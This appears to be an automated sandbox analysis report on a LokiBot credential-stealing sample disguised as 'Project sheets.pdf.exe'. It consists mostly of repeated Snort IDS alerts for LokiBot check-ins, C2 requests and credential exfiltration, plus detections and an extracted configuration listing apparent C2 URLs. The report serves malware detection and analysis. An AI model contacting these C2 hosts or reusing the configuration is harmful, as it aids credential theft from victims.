                Timestamp:192.168.2.3188.114.96.349885802024313 08/11/22-06:43:55.376397
                SID:2024313
                Source Port:49885
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349751802025381 08/11/22-06:42:22.964431
                SID:2025381
                Source Port:49751
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349753802021641 08/11/22-06:42:25.207102
                SID:2021641
                Source Port:49753
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349823802021641 08/11/22-06:43:13.321407
                SID:2021641
                Source Port:49823
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.96.349879802021641 08/11/22-06:43:48.403290
                SID:2021641
                Source Port:49879
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349785802825766 08/11/22-06:42:51.879415
                SID:2825766
                Source Port:49785
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349883802825766 08/11/22-06:43:53.308240
                SID:2825766
                Source Port:49883
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349750802024313 08/11/22-06:42:21.832277
                SID:2024313
                Source Port:49750
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.96.349788802025381 08/11/22-06:42:54.331478
                SID:2025381
                Source Port:49788
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349896802024313 08/11/22-06:44:07.789189
                SID:2024313
                Source Port:49896
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349748802825766 08/11/22-06:42:19.613257
                SID:2825766
                Source Port:49748
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349750802024318 08/11/22-06:42:21.832277
                SID:2024318
                Source Port:49750
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349748802025381 08/11/22-06:42:19.613257
                SID:2025381
                Source Port:49748
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349751802825766 08/11/22-06:42:22.964431
                SID:2825766
                Source Port:49751
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349793802025381 08/11/22-06:43:00.645450
                SID:2025381
                Source Port:49793
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.96.349756802021641 08/11/22-06:42:28.447484
                SID:2021641
                Source Port:49756
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349746802024313 08/11/22-06:42:17.452589
                SID:2024313
                Source Port:49746
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349882802025381 08/11/22-06:43:51.663595
                SID:2025381
                Source Port:49882
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.96.349791802025381 08/11/22-06:42:58.117986
                SID:2025381
                Source Port:49791
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349840802825766 08/11/22-06:43:28.505356
                SID:2825766
                Source Port:49840
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349766802825766 08/11/22-06:42:42.773950
                SID:2825766
                Source Port:49766
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349795802825766 08/11/22-06:43:03.020333
                SID:2825766
                Source Port:49795
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349896802024318 08/11/22-06:44:07.789189
                SID:2024318
                Source Port:49896
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349766802024318 08/11/22-06:42:42.773950
                SID:2024318
                Source Port:49766
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349828802025381 08/11/22-06:43:14.503252
                SID:2025381
                Source Port:49828
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349747802024318 08/11/22-06:42:18.537201
                SID:2024318
                Source Port:49747
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.96.349764802024318 08/11/22-06:42:41.209817
                SID:2024318
                Source Port:49764
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349898802025381 08/11/22-06:44:09.907279
                SID:2025381
                Source Port:49898
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349795802021641 08/11/22-06:43:03.020333
                SID:2021641
                Source Port:49795
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349774802025381 08/11/22-06:42:44.099150
                SID:2025381
                Source Port:49774
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349747802024313 08/11/22-06:42:18.537201
                SID:2024313
                Source Port:49747
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349840802025381 08/11/22-06:43:28.505356
                SID:2025381
                Source Port:49840
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.96.349752802021641 08/11/22-06:42:24.044623
                SID:2021641
                Source Port:49752
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.96.349788802825766 08/11/22-06:42:54.331478
                SID:2825766
                Source Port:49788
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349892802024318 08/11/22-06:44:04.916628
                SID:2024318
                Source Port:49892
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349750802825766 08/11/22-06:42:21.832277
                SID:2825766
                Source Port:49750
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349797802024318 08/11/22-06:43:05.379365
                SID:2024318
                Source Port:49797
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.96.349749802024318 08/11/22-06:42:20.745320
                SID:2024318
                Source Port:49749
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349881802025381 08/11/22-06:43:50.015660
                SID:2025381
                Source Port:49881
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349883802024318 08/11/22-06:43:53.308240
                SID:2024318
                Source Port:49883
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349794802024313 08/11/22-06:43:01.964847
                SID:2024313
                Source Port:49794
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349875802025381 08/11/22-06:43:47.334573
                SID:2025381
                Source Port:49875
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349892802024313 08/11/22-06:44:04.916628
                SID:2024313
                Source Port:49892
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.96.349755802024313 08/11/22-06:42:27.395952
                SID:2024313
                Source Port:49755
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349838802025381 08/11/22-06:43:24.421881
                SID:2025381
                Source Port:49838
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349786802025381 08/11/22-06:42:53.219319
                SID:2025381
                Source Port:49786
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349794802024318 08/11/22-06:43:01.964847
                SID:2024318
                Source Port:49794
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.96.349764802024313 08/11/22-06:42:41.209817
                SID:2024313
                Source Port:49764
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.96.349749802024313 08/11/22-06:42:20.745320
                SID:2024313
                Source Port:49749
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349757802021641 08/11/22-06:42:29.610436
                SID:2021641
                Source Port:49757
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349785802021641 08/11/22-06:42:51.879415
                SID:2021641
                Source Port:49785
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349883802024313 08/11/22-06:43:53.308240
                SID:2024313
                Source Port:49883
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349766802021641 08/11/22-06:42:42.773950
                SID:2021641
                Source Port:49766
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349867802024313 08/11/22-06:43:45.824252
                SID:2024313
                Source Port:49867
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349805802825766 08/11/22-06:43:09.287221
                SID:2825766
                Source Port:49805
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349850802025381 08/11/22-06:43:33.879385
                SID:2025381
                Source Port:49850
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.96.349777802024318 08/11/22-06:42:45.276948
                SID:2024318
                Source Port:49777
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349853802025381 08/11/22-06:43:40.660156
                SID:2025381
                Source Port:49853
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349782802021641 08/11/22-06:42:50.570997
                SID:2021641
                Source Port:49782
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349811802825766 08/11/22-06:43:10.662100
                SID:2825766
                Source Port:49811
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.96.349744802025381 08/11/22-06:42:15.052087
                SID:2025381
                Source Port:49744
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349761802025381 08/11/22-06:42:34.002289
                SID:2025381
                Source Port:49761
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349778802024313 08/11/22-06:42:46.945645
                SID:2024313
                Source Port:49778
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349763802825766 08/11/22-06:42:39.324991
                SID:2825766
                Source Port:49763
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349852802825766 08/11/22-06:43:38.361573
                SID:2825766
                Source Port:49852
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.96.349777802024313 08/11/22-06:42:45.276948
                SID:2024313
                Source Port:49777
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349758802025381 08/11/22-06:42:30.656105
                SID:2025381
                Source Port:49758
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:188.114.97.3192.168.2.380497982025483 08/11/22-06:43:06.684563
                SID:2025483
                Source Port:80
                Destination Port:49798
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349757802825766 08/11/22-06:42:29.610436
                SID:2825766
                Source Port:49757
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349798802825766 08/11/22-06:43:06.576803
                SID:2825766
                Source Port:49798
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349859802825766 08/11/22-06:43:42.759258
                SID:2825766
                Source Port:49859
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349823802024318 08/11/22-06:43:13.321407
                SID:2024318
                Source Port:49823
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349763802021641 08/11/22-06:42:39.324991
                SID:2021641
                Source Port:49763
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349742802025381 08/11/22-06:42:12.661275
                SID:2025381
                Source Port:49742
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.96.349885802024318 08/11/22-06:43:55.376397
                SID:2024318
                Source Port:49885
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349852802021641 08/11/22-06:43:38.361573
                SID:2021641
                Source Port:49852
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.96.349755802024318 08/11/22-06:42:27.395952
                SID:2024318
                Source Port:49755
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349797802024313 08/11/22-06:43:05.379365
                SID:2024313
                Source Port:49797
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.96.349887802025381 08/11/22-06:43:58.405291
                SID:2025381
                Source Port:49887
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.97.349830802825766 08/11/22-06:43:16.837786
                SID:2825766
                Source Port:49830
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3188.114.96.349756802825766 08/11/22-06:42:28.447484
                SID:2825766
                Source Port:49756
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: http://tixfilmz.gq/Devil/PWS/fre.phpAvira URL Cloud: Label: malware
                Source: Project sheets.pdf.exeJoe Sandbox ML: detected
                Source: 00000003.00000000.244853180.0000000000400000.00000040.00000400.00020000.00000000.sdmpMalware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php"]}
                Source: Project sheets.pdf.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                Source: Project sheets.pdf.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: WHGDFHKDLHDJD.pdb source: Project sheets.pdf.exe, 00000000.00000002.245997342.0000000003130000.00000004.08000000.00040000.00000000.sdmp, Project sheets.pdf.exe, 00000000.00000002.246034817.00000000031D1000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: QQBCXNMHJF.pdb source: Project sheets.pdf.exe
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,3_2_00403D74

                Networking

                barindex
                Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.3:49742 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49742 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49742 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.3:49742 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49742 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.3:49743 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49743 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49743 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.3:49743 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49743 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49744 -> 188.114.96.3:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49744 -> 188.114.96.3:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49744 -> 188.114.96.3:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49744 -> 188.114.96.3:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49744 -> 188.114.96.3:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49745 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49745 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49745 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49745 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49745 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49746 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49746 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49746 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49746 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49746 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49747 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49747 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49747 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49747 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49747 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49748 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49748 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49748 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49748 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49748 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49749 -> 188.114.96.3:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49749 -> 188.114.96.3:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49749 -> 188.114.96.3:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49749 -> 188.114.96.3:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49749 -> 188.114.96.3:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49750 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49750 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49750 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49750 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49750 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49751 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49751 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49751 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49751 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49751 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49752 -> 188.114.96.3:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49752 -> 188.114.96.3:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49752 -> 188.114.96.3:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49752 -> 188.114.96.3:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49752 -> 188.114.96.3:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49753 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49753 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49753 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49753 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49753 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49754 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49754 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49754 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49754 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49754 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49755 -> 188.114.96.3:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49755 -> 188.114.96.3:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49755 -> 188.114.96.3:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49755 -> 188.114.96.3:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49755 -> 188.114.96.3:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49756 -> 188.114.96.3:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49756 -> 188.114.96.3:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49756 -> 188.114.96.3:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49756 -> 188.114.96.3:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49756 -> 188.114.96.3:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49757 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49757 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49757 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49757 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49757 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49758 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49758 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49758 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49758 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49758 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49759 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49759 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49759 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49759 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49759 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49760 -> 188.114.96.3:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49760 -> 188.114.96.3:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49760 -> 188.114.96.3:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49760 -> 188.114.96.3:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49760 -> 188.114.96.3:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49761 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49761 -> 188.114.97.3:80
